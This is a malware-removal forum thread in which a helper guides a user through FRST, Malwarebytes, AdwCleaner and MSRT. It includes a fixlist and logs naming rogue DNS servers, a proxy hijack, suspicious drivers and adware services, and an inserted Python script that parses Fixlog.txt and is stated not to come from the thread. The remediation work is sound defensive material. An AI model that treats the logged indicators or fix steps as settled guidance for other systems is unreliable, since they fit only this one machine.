Author Topic: [Resolved - K] openwith.exe popping up on the screen  (Read 231 times)

Offline feelityd08

  • Bronze Member
  • Posts: 8
[Resolved - K] openwith.exe popping up on the screen
« on: November 16, 2017, 05:16:00 AM »
Hi guys, I'm having a problem with my PC. I recently deleted files which were quarantined by McAfee LiveSafe and immediately after that, an openwith.exe started popping up on the screen asking me how I want to open a .tmp file, and it pops up every two minutes. How can I deal with that problem?
« Last Edit: November 20, 2017, 12:54:09 PM by kevinf80 »

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7676
Re: openwith.exe popping up on the screen
« Reply #1 on: November 18, 2017, 03:26:35 AM »
Hello feelityd08 and welcome to SpywareHammer,

What is the name of the temp file being listed....? Run the following scan and post the two produced logs...

Download Farbar Recovery Scan Tool and save it to your desktop.

Alternative download option: http://www.techspot.com/downloads/6731-farbar-recovery-scan-tool.html

Note: You need to run the version compatible with your system (32 bit or 64 bit). If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

If your security alerts to FRST, either accept the alert or turn your security off to allow FRST to run. It is not malicious or infected in any way...

Be aware FRST must be run from an account with Administrator status...

  • Double-click to run it. When the tool opens click Yes to disclaimer.
    (Windows 8/10 users will be prompted about Windows SmartScreen protection - click More information and Run.)
  • Make sure Addition.txt is checkmarked under "Optional scans"
  • Press Scan button to run the tool....
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The tool will also make a log named (Addition.txt)  Please attach that log to your reply.
Thank you,

Kevin..

Offline feelityd08

  • Bronze Member
  • Posts: 8
Re: openwith.exe popping up on the screen
« Reply #2 on: November 18, 2017, 09:47:46 AM »
Thank you Kevinf80, I will let you know after I try it.

Offline feelityd08

  • Bronze Member
  • Posts: 8
Re: openwith.exe popping up on the screen
« Reply #3 on: November 18, 2017, 09:59:30 AM »
The pop-up is still there and I have attached the log as you instructed.

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7676
Re: openwith.exe popping up on the screen
« Reply #4 on: November 18, 2017, 02:05:20 PM »
Hello feelityd08,

Your system is still infected, I'll get this moved to the Malware Removal Forum... FRST produces two logs with its initial scan, FRST.txt and Addition.txt; we cannot progress until you post the secondary log, Addition.txt. Logs are saved to the following folder: C:\FRST\Logs

Thank you,

Kevin....
« Last Edit: November 18, 2017, 02:09:43 PM by kevinf80 »

Offline feelityd08

  • Bronze Member
  • Posts: 8
Re: openwith.exe popping up on the screen
« Reply #5 on: November 19, 2017, 01:11:34 AM »
I tried to open it using Notepad and it's pointing out something about revopartner.exe

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7676
Re: openwith.exe popping up on the screen
« Reply #6 on: November 19, 2017, 03:44:15 AM »
Can you also post the secondary log from FRST, "Addition.txt"? Logs are saved here: C:\FRST\Logs. I cannot progress until I see that log......

Offline feelityd08

  • Bronze Member
  • Posts: 8
Re: [In Progress - K] openwith.exe popping up on the screen
« Reply #7 on: November 19, 2017, 05:55:06 AM »
I'm not sure which one is the secondary log so I'm gonna attach both of them.

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7676
Re: [In Progress - K] openwith.exe popping up on the screen
« Reply #8 on: November 19, 2017, 11:25:38 AM »
Thanks for those logs, continue as follows:

Download attached fixlist.txt file (end of reply) and save it to the Desktop, or the folder you saved FRST into. "Do not open that file"
NOTE. It's important that both FRST and fixlist.txt are in the same location or the fix will not work.

Open FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt) or the folder it was run from. Please post it to your reply.

Next,

Open Malwarebytes Anti-Malware.

  • On the Settings tab > Protection, scroll to and make sure the following are selected:

    Scan for Rootkits
    Scan within Archives

  • Scroll further to Potential Threat Protection and make sure the following are set as follows:

    Potentially Unwanted Programs (PUP's)         set as :- Always detect PUP's (recommended)
    Potentially Unwanted Modifications (PUM's)  set as :- Always detect PUM's (recommended)

  • Click on Scan, make sure Threat Scan is selected,
  • A Threat Scan will begin.
  • When the scan is complete if anything is found make sure that the first checkbox at the top is checked (that will automatically check all detected items), then click on the Quarantine Selected Tab
  • If asked to restart your computer to complete the removal, please do so
  • When complete click on Export Summary after deletion (bottom-left corner) and select Copy to Clipboard.
  • Wait for the prompt to restart the computer to appear, then click on Yes.
  • After the restart once you are back at your desktop, open MBAM once more to retrieve the log.

To get the log from Malwarebytes do the following:

  • Click on the Reports tab > from main interface.
  • Double click on the Scan log which shows the Date and time of the scan just performed.
  • Click Export > From export you have two options:

      Copy to Clipboard - if selected, right click to your reply and select "Paste"; the log will be pasted to your reply
      Text file (*.txt)        - if selected you will have to name the file and save to a place of choice, recommend "Desktop", then attach to reply

  • Use "Copy to Clipboard", then right click to your reply > select "Paste"; that will copy the log to your reply…

Next,

Download AdwCleaner by Malwarebytes onto your Desktop.

Or from this Mirror

  • Right-click on AdwCleaner.exe and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Accept the EULA (I accept), then click on Scan
  • Let the scan complete. Once it's done, make sure that every item listed in the different tabs is checked and click on the Clean button. This will kill all the active processes
  • Once the cleaning process is complete, AdwCleaner will ask to restart your computer, do it
  • After the restart, a log will open when logging in. Please copy/paste the content of that log in your next reply

Next,

Download Microsoft's "Malicious Software Removal Tool" and save direct to the desktop

Ensure to get the correct version for your system....

https://www.microsoft.com/en-gb/download/malicious-software-removal-tool-details.aspx


Right click on the Tool, select “Run as Administrator”; the tool will expand to the options Window
In the "Scan Type" window, select Quick Scan
Perform a scan and click Finish when the scan is done.


Retrieve the MSRT log as follows, and post it in your next reply:

1) Select the Windows key and R key together to open the "Run" function
2) Type or Copy/Paste the following command to the "Run Line" and Press Enter:

notepad c:\windows\debug\mrt.log

The log will include log details for each time MSRT has run, we only need the most recent log by date and time....

Let me see those logs in your next reply, also tell me if you have any remaining issues or concerns...

Thank you,

Kevin...
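
A triage sketch for the Fixlog.txt requested above, added here as an example (it is not from this thread, SpywareHammer or FRST): it reads the `target => outcome` result lines, skips the echoed fixlist, and reports items whose last recorded outcome is a failure or a pending reboot move. The sample lines follow the format of the Fixlog posted later in this thread; the function names and status labels are this example's own.

```python
import re

# Sample lines in the format of the Fixlog.txt posted in this thread (trimmed).
SAMPLE_FIXLOG = r'''Fix result of Farbar Recovery Scan Tool (x64) Version: 19-11-2017
fixlist content:
*****************
Start
ProxyServer: [S-1-5-21-2095655220-3272508173-1458086532-1001] => http=127.0.0.1:8080;https=127.0.0.1:8080
C:\Program Files\Essentware
end

*****************

Processes closed successfully.
AccountService => Unable to stop service.
HKLM\System\CurrentControlSet\Services\AccountService => key removed successfully
AccountService => service removed successfully
C:\Program Files\Essentware\Common\AccountService.exe => moved successfully

"C:\Program Files\Essentware" folder move:

Could not move "C:\Program Files\Essentware" => Scheduled to move on reboot.
Could not move "C:\ProgramData\Essentware" => Scheduled to move on reboot.
"C:\Program Files\PCKeeper" => not found.

BITS transfer queue => 8675328 B
EmptyTemp: => 6.1 GB temporary data Removed.

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 20-11-2017 09:00:39)

"C:\Program Files\Essentware" => Could not move
"C:\ProgramData\Essentware" => Could not move
'''

# Outcome text -> status label (labels are this example's own, not FRST terms).
# Order matters: "Could not move ... => Scheduled to move on reboot." is pending.
RULES = [
    (re.compile(r"scheduled to move on reboot", re.I), "pending"),
    (re.compile(r"could not move|unable to ", re.I), "failed"),
    (re.compile(r"not found", re.I), "absent"),
    (re.compile(r"\b(moved|removed|restored) successfully", re.I), "ok"),
]


def classify(outcome):
    """Map the text right of '=>' to a status, or None for non-result lines."""
    for pattern, status in RULES:
        if pattern.search(outcome):
            return status
    return None


def parse_results(text):
    """Yield (target, status) per result line, skipping the echoed fixlist."""
    stars_to_skip = 0
    for raw in text.splitlines():
        line = raw.strip()
        if line.lower().startswith("fixlist content:"):
            stars_to_skip = 2          # echo is bracketed by two rows of '*'
            continue
        if stars_to_skip:
            if line and set(line) == {"*"}:
                stars_to_skip -= 1
            continue
        if " => " not in line:
            continue
        # rsplit keeps '<==== ATTENTION' markers on the target side.
        target, outcome = line.rsplit(" => ", 1)
        status = classify(outcome)
        if status is None:             # e.g. EmptyTemp size lines
            continue
        target = re.sub(r"^could not move\s+", "", target, flags=re.I).strip('"')
        yield target, status


def final_states(text):
    """Return {target: [status, ...]} in log order, matching targets case-insensitively."""
    states = {}
    for target, status in parse_results(text):
        states.setdefault(target.lower(), [target, []])[1].append(status)
    return {name: history for name, history in states.values()}


def unresolved(text):
    """Targets whose last recorded outcome is a failure or a pending reboot move."""
    return {t: h for t, h in final_states(text).items()
            if h[-1] in ("failed", "pending")}


if __name__ == "__main__":
    for target, history in unresolved(SAMPLE_FIXLOG).items():
        print(f"{target}: {' -> '.join(history)}")
```

Items reported here are the ones to confirm in the next tool's log or a fresh scan; a service that first shows "Unable to stop service" and is then removed is not reported.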

Offline feelityd08

  • Bronze Member
  • Posts: 8
Re: [In Progress - K] openwith.exe popping up on the screen
« Reply #9 on: November 20, 2017, 01:37:12 AM »
Fix result of Farbar Recovery Scan Tool (x64) Version: 19-11-2017
Ran by BOSS TSAPO (20-11-2017 08:52:34) Run:1
Running from C:\Users\BOSS TSAPO\Downloads
Loaded Profiles: BOSS TSAPO (Available Profiles: BOSS TSAPO & DefaultAppPool)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
CloseProcesses:
CreateRestorePoint:
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION
HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\...\MountPoints2: {602eeec7-ae9d-11e7-af99-c85b76155e7d} - "I:\setup.exe"
HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\...\Winlogon: [Shell] C:\WINDOWS\explorer.exe [4848960 2017-10-02] (Microsoft Corporation) <==== ATTENTION
GroupPolicy: Restriction <==== ATTENTION
ProxyServer: [S-1-5-21-2095655220-3272508173-1458086532-1001] => http=127.0.0.1:8080;https=127.0.0.1:8080
Winsock: Catalog5-x64 01 C:\ProgramData\Windows\System32\Mswapi64.dll [3302400 2017-07-19] ()
CMD: netsh winsock reset
C:\ProgramData\Windows\System32\Mswapi64.dll
Tcpip\Parameters: [DhcpNameServer] 41.79.193.253 41.79.193.254
Tcpip\Parameters: [NameServer] 82.163.143.136 82.163.142.138
Tcpip\..\Interfaces\{94c01e0b-9b72-49d6-863a-69309fc7b27d}: [DhcpNameServer] 82.163.143.136
Tcpip\..\Interfaces\{c5bf3128-6c5e-47a3-aaa7-3fdd10dbfd36}: [DhcpNameServer] 82.163.143.136
Tcpip\..\Interfaces\{cff16417-6e88-4e63-be40-7f0f7937f4e8}: [DhcpNameServer] 41.79.193.253 41.79.193.254
R2 AccountService; C:\Program Files\Essentware\Common\AccountService.exe [211136 2016-02-29] (Essentware) <==== ATTENTION
C:\Program Files\Essentware\Common\AccountService.exe
R2 PCKeeper2Service; C:\Program Files\Essentware\PCKeeper\PCKeeperService.exe [216512 2016-11-11] (Essentware) <==== ATTENTION
C:\Program Files\Essentware\PCKeeper\PCKeeperService.exe
R2 PCKeeperOcfService; C:\Program Files\Essentware\PCKeeper\OneClickFixService.exe [1179840 2016-11-11] (Essentware) <==== ATTENTION
C:\Program Files\Essentware\PCKeeper\OneClickFixService.exe
C:\Program Files\Essentware
S3 updater; C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe [464384 2016-01-10] (Nefarius Software Solutions) [File not signed]
C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe
C:\Program Files\Nefarius Software Solutions
S3 fileHiders; C:\WINDOWS\System32\DRIVERS\fileHiders.sys [32352 2016-11-11] () <==== ATTENTION
C:\WINDOWS\System32\DRIVERS\fileHiders.sys
R1 LanmaMaster; C:\Windows\system32\drivers\lanmamaster.sys [1474664 2016-10-25] () [File not signed] <==== ATTENTION
C:\Windows\system32\drivers\lanmamaster.sys
S1 exccodbf; \??\C:\WINDOWS\system32\drivers\exccodbf.sys [X]
2017-11-14 19:19 - 2017-11-14 19:19 - 000003684 _____ C:\WINDOWS\System32\Tasks\PCKeeper updater
2017-11-14 19:17 - 2017-11-14 19:17 - 000002050 _____ C:\Users\Public\Desktop\PCKeeper Antivirus.lnk
2017-11-14 19:16 - 2017-11-14 19:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Essentware
2017-11-14 19:16 - 2017-11-14 19:16 - 000002080 _____ C:\Users\Public\Desktop\PCKeeper.lnk
2017-11-14 19:16 - 2017-11-14 19:16 - 000000000 ____D C:\Users\BOSS TSAPO\AppData\Local\Essentware
2017-11-14 19:15 - 2017-11-17 19:19 - 000000000 ____D C:\ProgramData\Essentware
2017-11-14 19:15 - 2017-11-14 19:17 - 000000000 ____D C:\Program Files\Essentware
2017-11-14 19:14 - 2017-11-14 19:14 - 001708384 _____ (Essentware) C:\Users\BOSS TSAPO\Downloads\PCKeeper Installer.exe
2017-11-10 13:33 - 2017-11-10 13:35 - 020992472 _____ (SweetLabs,Inc.) C:\Users\BOSS TSAPO\AppData\Local\Temp\octD61A.tmp.exe
PCKeeper (HKLM\...\{F7DA7463-F666-41B3-B16B-8968A43BA6D4}) (Version: 2.2.2299 - Essentware) Hidden
PCKeeper Antivirus (HKLM\...\{5A4A7D29-7589-427B-86BC-8C313278BF89}) (Version: 1.1.1057 - Essentware) Hidden
Online Application (HKLM-x32\...\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}) (Version: 2.6.0 - Microleaves) Hidden <==== ATTENTION
C:\Program Files\PCKeeper
C:\ProgramData\PCKeeper
EmptyTemp:
Hosts:
CMD: ipconfig /flushDNS
end


*****************

Processes closed successfully.
Restore point was successfully created.
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION => restored successfully
HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{602eeec7-ae9d-11e7-af99-c85b76155e7d} => key removed successfully
HKLM\Software\Classes\CLSID\{602eeec7-ae9d-11e7-af99-c85b76155e7d} => key not found.
HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell => value removed successfully
C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value removed successfully
HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries64\000000000001 => key removed successfully

========= netsh winsock reset =========

Initialization Function InitHelperDll in NSHHTTP.DLL failed to start with error code 11003

Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.


========= End of CMD: =========

C:\ProgramData\Windows\System32\Mswapi64.dll => moved successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\DhcpNameServer => value removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\NameServer => value removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{94c01e0b-9b72-49d6-863a-69309fc7b27d}\\DhcpNameServer => value removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{c5bf3128-6c5e-47a3-aaa7-3fdd10dbfd36}\\DhcpNameServer => value removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{cff16417-6e88-4e63-be40-7f0f7937f4e8}\\DhcpNameServer => value removed successfully
AccountService => Unable to stop service.
HKLM\System\CurrentControlSet\Services\AccountService => key removed successfully
AccountService => service removed successfully
C:\Program Files\Essentware\Common\AccountService.exe => moved successfully
PCKeeper2Service => Unable to stop service.
HKLM\System\CurrentControlSet\Services\PCKeeper2Service => key removed successfully
PCKeeper2Service => service removed successfully
C:\Program Files\Essentware\PCKeeper\PCKeeperService.exe => moved successfully
PCKeeperOcfService => Unable to stop service.
HKLM\System\CurrentControlSet\Services\PCKeeperOcfService => key removed successfully
PCKeeperOcfService => service removed successfully
C:\Program Files\Essentware\PCKeeper\OneClickFixService.exe => moved successfully

"C:\Program Files\Essentware" folder move:

Could not move "C:\Program Files\Essentware" => Scheduled to move on reboot.

HKLM\System\CurrentControlSet\Services\updater => key removed successfully
updater => service removed successfully
C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe => moved successfully
C:\Program Files\Nefarius Software Solutions => moved successfully
HKLM\System\CurrentControlSet\Services\fileHiders => key removed successfully
fileHiders => service removed successfully
C:\WINDOWS\System32\DRIVERS\fileHiders.sys => moved successfully
LanmaMaster => Unable to stop service.
HKLM\System\CurrentControlSet\Services\LanmaMaster => key removed successfully
LanmaMaster => service removed successfully
C:\Windows\system32\drivers\lanmamaster.sys => moved successfully
HKLM\System\CurrentControlSet\Services\exccodbf => key removed successfully
exccodbf => service removed successfully
C:\WINDOWS\System32\Tasks\PCKeeper updater => moved successfully
C:\Users\Public\Desktop\PCKeeper Antivirus.lnk => moved successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Essentware => moved successfully
C:\Users\Public\Desktop\PCKeeper.lnk => moved successfully
C:\Users\BOSS TSAPO\AppData\Local\Essentware => moved successfully

"C:\ProgramData\Essentware" folder move:

Could not move "C:\ProgramData\Essentware" => Scheduled to move on reboot.


"C:\Program Files\Essentware" folder move:

Could not move "C:\Program Files\Essentware" => Scheduled to move on reboot.

C:\Users\BOSS TSAPO\Downloads\PCKeeper Installer.exe => moved successfully
C:\Users\BOSS TSAPO\AppData\Local\Temp\octD61A.tmp.exe => moved successfully
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F7DA7463-F666-41B3-B16B-8968A43BA6D4}\\SystemComponent => value removed successfully
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5A4A7D29-7589-427B-86BC-8C313278BF89}\\SystemComponent => value removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}\\SystemComponent => value removed successfully
"C:\Program Files\PCKeeper" => not found.
"C:\ProgramData\PCKeeper" => not found.
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

========= ipconfig /flushDNS =========


Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8675328 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 30903848 B
Java, Flash, Steam htmlcache => 71077656 B
Windows/system/drivers => 636098819 B
Edge => 31018 B
Chrome => 73721502 B
Firefox => 386927292 B
Opera => 145226 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 2021890 B
systemprofile32 => 128 B
LocalService => 0 B
NetworkService => 33722590 B
BOSS TSAPO => 5341612081 B
DefaultAppPool => 0 B

RecycleBin => 0 B
EmptyTemp: => 6.1 GB temporary data Removed.

================================

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 20-11-2017 09:00:39)

"C:\Program Files\Essentware" => Could not move
"C:\ProgramData\Essentware" => Could not move
"C:\Program Files\Essentware" => Could not move

==== End of Fixlog 09:00:53 ====





# AdwCleaner 7.0.4.0 - Logfile created on Mon Nov 20 07:23:45 2017
# Updated on 2017/27/10 by Malwarebytes
# Running on Windows 10 Home Single Language (X64)
# Mode: clean
# Support: https://www.malwarebytes.com/support

***** [ Services ] *****

Deleted: PCKAVService


***** [ Folders ] *****

Deleted: C:\ProgramData\Host App Service
Deleted: C:\ProgramData\Application Data\Host App Service
Deleted: C:\Users\All Users\Host App Service
Deleted: C:\Users\BOSS TSAPO\AppData\Local\Host App Service
Deleted: C:\Users\Default\AppData\Local\Host App Service
Deleted: C:\Users\Default User\AppData\Local\Host App Service
Deleted: C:\Users\DefaultAppPool\AppData\Local\Host App Service
Deleted: C:\Users\BOSS TSAPO\AppData\Roaming\WMPNetworkAcSvc
Deleted: C:\ProgramData\WinZip\WinZip Smart Monitor
Deleted: C:\ProgramData\Application Data\WinZip\WinZip Smart Monitor
Deleted: C:\Users\All Users\WinZip\WinZip Smart Monitor
Deleted: C:\Program Files\WinZip Smart Monitor
Deleted: C:\Users\BOSS TSAPO\AppData\Local\AdvinstAnalytics
Deleted: C:\Program Files (x86)\WindowsTM
Deleted: C:\Users\All Users\Documents\XMUpdate
Deleted: C:\Users\Public\Documents\XMUpdate
Deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft\WebCompanion
Deleted: C:\Users\BOSS TSAPO\AppData\Local\PCBooster
Deleted: C:\ProgramData\Microleaves
Deleted: C:\ProgramData\Application Data\Microleaves
Deleted: C:\Program Files (x86)\Microleaves
Deleted: C:\Users\All Users\Microleaves
Deleted: C:\Users\BOSS TSAPO\AppData\Roaming\Microleaves
Deleted: C:\ProgramData\Essentware
Deleted: C:\ProgramData\Application Data\Essentware
Deleted: C:\Program Files\Essentware
Deleted: C:\Users\All Users\Essentware
Deleted: C:\\Users\Public\Documents\XMUpdate
Deleted: C:\ProgramData\1e164d5f
Deleted: C:\ProgramData\9463ebbb-3123-1
Deleted: C:\ProgramData\9463ebbb-6ff7-0
Deleted: C:\ProgramData\bda2b42c-0fa5-1
Deleted: C:\ProgramData\bda2b42c-5313-0
Deleted: C:\ProgramData\{318d22ec-212c-1}
Deleted: C:\ProgramData\{5a7c27e3-012c-0}


***** [ Files ] *****

Deleted: C:\Windows\SysNative\drivers\zeoscanner.sys
Deleted: C:\Windows\SysNative\lanmamasterHelp.dll
Deleted: C:\Users\BOSS TSAPO\appdata\local\installationconfiguration.xml
Deleted: C:\Users\BOSS TSAPO\AppData\Roaming\Mozilla\Firefox\Profiles\2gwlwnaw.default\searchplugins\yahoo-lavasoft.xml
Deleted: C:\Users\BOSS TSAPO\AppData\Local\PO.DB
Deleted: C:\Users\All Users\Desktop\MediaPlayAir.lnk
Deleted: C:\Users\Public\Desktop\MediaPlayAir.lnk


***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

Cleaned: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk[http:\\pop.yeawindows.com\]
Cleaned: C:\Users\BOSS TSAPO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk[http:\\pop.yeawindows.com\]
Cleaned: C:\Users\Public\Desktop\Google Chrome.lnk[http:\\pop.yeawindows.com\]


***** [ Tasks ] *****

Deleted: App Explorer
Deleted: ShadowsocksS
Deleted: FastDataX Task
Deleted: PCKeeper updater
Deleted: Updater_Online_Application
Deleted: DllKitPRO
Deleted: Updater_Online_Application


***** [ Registry ] *****

Deleted: [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\utop.it
Deleted: [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\utop.it
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E7E7B26A-88AA-48B0-A47C-173C062FD904}
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E44BBEE3-3F83-4670-9E2E-EE0556442287}
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Host App Service
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service
Deleted: [Key] - HKCU\Software\Host App Service
Deleted: [Key] - HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service
Deleted: [Key] - HKLM\SOFTWARE\Lavasoft\Web Companion
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Lavasoft\Web Companion
Deleted: [Key] - HKCU\Software\Lavasoft\Web Companion
Deleted: [Key] - HKLM\SOFTWARE\SkypeUpdateEx
Deleted: [Key] - HKLM\SOFTWARE\WMPNetworkAcSvc
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WindowsTM
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{990F7D4F-09EF-47DF-9ABE-BAF2DCCF5C4B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{CF6E1E3B-5B36-4A71-9105-DC75B4089D8C}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{CF6E1E3B-5B36-4A71-9105-DC75B4089D8C}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{0319DE47-F039-45DC-A213-DBB61C6AE509}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{0319DE47-F039-45DC-A213-DBB61C6AE509}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{074BFF31-CA38-43C4-8F25-79213AD708EF}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{074BFF31-CA38-43C4-8F25-79213AD708EF}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{0D838143-D511-4555-8B97-16C3CF5A780D}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{0D838143-D511-4555-8B97-16C3CF5A780D}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{16A94A89-66C4-4990-896C-5FC3E1557FFD}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{206E5E13-3B8F-4146-9C21-F18A63A9689B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{206E5E13-3B8F-4146-9C21-F18A63A9689B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{2B5E8E95-F503-4530-A340-53DE89F3358F}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{2B5E8E95-F503-4530-A340-53DE89F3358F}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{2F8F99FD-7C0E-4150-8DFD-13B1F4FBD916}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{33B2A2E0-18F6-45CB-8080-04320066A4A1}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{40B50C00-06BB-415F-8F4E-6DEF53957ABA}
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved|{40B50C00-06BB-415F-8F4E-6DEF53957ABA}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{503F82AB-1549-4B08-AF10-289CCCF3BE4B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{6AF595D6-D4A0-4ACA-ADD4-62034EE9FF3A}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{6F09F687-2C4C-4A37-8D7A-2CB76D2B3F71}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{6F09F687-2C4C-4A37-8D7A-2CB76D2B3F71}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{723F0E89-F10C-4D28-A46C-934513EA963A}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{7944171A-50CC-479E-A6FC-B1E25E665C25}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{7A2BA8C4-F382-4DD1-A6D2-A86C6D66C4F9}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{7A2BA8C4-F382-4DD1-A6D2-A86C6D66C4F9}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{80E9CB05-9C8B-4B85-8A66-D81092F5AF60}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{817BF5D8-380E-44F4-8E61-43E7ECF74B53}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{828FB706-5749-4255-862F-3D30FCF017E1}
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved|{828FB706-5749-4255-862F-3D30FCF017E1}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{8888A22B-3380-4C2B-950F-A5B6EC527A4B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{8888A22B-3380-4C2B-950F-A5B6EC527A4B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{9443C19D-B318-4EBD-8A7F-6A50D0472FB4}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{95CAD169-7912-410E-8C8A-7BA1729BD8F7}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{B462C1CA-E368-4321-B0B1-0453E4AB6FDB}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{CCF68051-721D-40C7-812D-86ED0FDE7411}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{D8F2F7F9-F8F3-4562-9FDA-C1E2DAE60A30}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{D8F2F7F9-F8F3-4562-9FDA-C1E2DAE60A30}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{DEE0443A-95B1-41DF-B50A-409FDEA53644}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{F55EA208-E122-4B4E-8483-4404A1CC9569}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{F6649783-7559-4772-96C7-02D33BEACD8C}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{F6649783-7559-4772-96C7-02D33BEACD8C}
